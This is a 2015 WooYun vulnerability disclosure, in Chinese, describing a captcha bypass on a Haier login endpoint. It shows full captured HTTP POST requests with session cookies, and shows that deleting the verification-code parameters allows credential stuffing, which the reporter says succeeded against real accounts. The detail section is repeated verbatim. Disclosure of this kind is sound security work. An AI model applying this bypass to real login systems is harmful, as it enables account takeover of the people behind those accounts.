当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155066

漏洞标题:海尔某登录位置设计缺陷可绕过验证码撞库网站用户

相关厂商:海尔集团

漏洞作者: 路人甲

提交时间:2015-11-23 11:23

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

海尔某登录位置设计缺陷可绕过验证码撞库网站用户

详细说明:

http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com

1.png


这处登录接口位置,一开始没有验证码,错误几次之后就出来了验证码,但是经过测试,验证码可以绕过的,具体绕过如下:
抓包数据如下:

POST /ids/cn/haier_do_loginajax.jsp HTTP/1.1
Host: testuser.haier.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com
Content-Length: 107
Cookie: JSESSIONID=FCC6C405642715536868425CD19AB9C9; trsidsssosessionid=6F68C80B4E7162FCFD9160CE432FC314-10.159.63.16; _gscu_1690714239=4818699272bbn213; _gscs_1690714239=48186992gp9rtt13|pv:5; _gscbrs_1690714239=1; _gscu_345248242=481869925phjju13; _gscs_345248242=48186992pb3nee13|pv:5; _gscbrs_345248242=1; _gscu_786492823=481873551f9z3020; _gscs_786492823=481873551njtve20|pv:1; _gscbrs_786492823=1; trsidssdssotoken=CFD221FAB7E56B75915109B81FEC2AB2-10.159.63.77_1448230841656
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
returnUrl=%2Fcn&userName=aaa&password=aaaaaaaaaaa&autoLogin=true&cookieTime=0.5&verifyCodes=6759&viplogin=0


删除:

&autoLogin=true&cookieTime=0.5&verifyCodes=6759&viplogin=0


修改为:

POST /ids/cn/haier_do_loginajax.jsp HTTP/1.1
Host: testuser.haier.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com
Content-Length: 107
Cookie: JSESSIONID=FCC6C405642715536868425CD19AB9C9; trsidsssosessionid=6F68C80B4E7162FCFD9160CE432FC314-10.159.63.16; _gscu_1690714239=4818699272bbn213; _gscs_1690714239=48186992gp9rtt13|pv:5; _gscbrs_1690714239=1; _gscu_345248242=481869925phjju13; _gscs_345248242=48186992pb3nee13|pv:5; _gscbrs_345248242=1; _gscu_786492823=481873551f9z3020; _gscs_786492823=481873551njtve20|pv:1; _gscbrs_786492823=1; trsidssdssotoken=CFD221FAB7E56B75915109B81FEC2AB2-10.159.63.77_1448230841656
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
returnUrl=%2Fcn&userName=aaa&password=aaaaaaaaaaa


然后就提示的是你的用户名或者密码好像不对哦!而不是验证码错误类的信息了
用户名密码明文传输的:

2.png


测试撞库成功,这里出来了一些就停了,证明确实是可以撞库的:

3.png


登录帐号证明:

5.png


6.png

漏洞证明:

http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com

1.png


这处登录接口位置,一开始没有验证码,错误几次之后就出来了验证码,但是经过测试,验证码可以绕过的,具体绕过如下:
抓包数据如下:

POST /ids/cn/haier_do_loginajax.jsp HTTP/1.1
Host: testuser.haier.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com
Content-Length: 107
Cookie: JSESSIONID=FCC6C405642715536868425CD19AB9C9; trsidsssosessionid=6F68C80B4E7162FCFD9160CE432FC314-10.159.63.16; _gscu_1690714239=4818699272bbn213; _gscs_1690714239=48186992gp9rtt13|pv:5; _gscbrs_1690714239=1; _gscu_345248242=481869925phjju13; _gscs_345248242=48186992pb3nee13|pv:5; _gscbrs_345248242=1; _gscu_786492823=481873551f9z3020; _gscs_786492823=481873551njtve20|pv:1; _gscbrs_786492823=1; trsidssdssotoken=CFD221FAB7E56B75915109B81FEC2AB2-10.159.63.77_1448230841656
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
returnUrl=%2Fcn&userName=aaa&password=aaaaaaaaaaa&autoLogin=true&cookieTime=0.5&verifyCodes=6759&viplogin=0


删除:

&autoLogin=true&cookieTime=0.5&verifyCodes=6759&viplogin=0


修改为:

POST /ids/cn/haier_do_loginajax.jsp HTTP/1.1
Host: testuser.haier.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com
Content-Length: 107
Cookie: JSESSIONID=FCC6C405642715536868425CD19AB9C9; trsidsssosessionid=6F68C80B4E7162FCFD9160CE432FC314-10.159.63.16; _gscu_1690714239=4818699272bbn213; _gscs_1690714239=48186992gp9rtt13|pv:5; _gscbrs_1690714239=1; _gscu_345248242=481869925phjju13; _gscs_345248242=48186992pb3nee13|pv:5; _gscbrs_345248242=1; _gscu_786492823=481873551f9z3020; _gscs_786492823=481873551njtve20|pv:1; _gscbrs_786492823=1; trsidssdssotoken=CFD221FAB7E56B75915109B81FEC2AB2-10.159.63.77_1448230841656
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
returnUrl=%2Fcn&userName=aaa&password=aaaaaaaaaaa


然后就提示的是你的用户名或者密码好像不对哦!而不是验证码错误类的信息了
用户名密码明文传输的:

2.png


测试撞库成功,这里出来了一些就停了,证明确实是可以撞库的:

3.png


登录帐号证明:

5.png


6.png

修复方案:

验证码修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-24 13:33

厂商回复:

感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理

最新状态:

暂无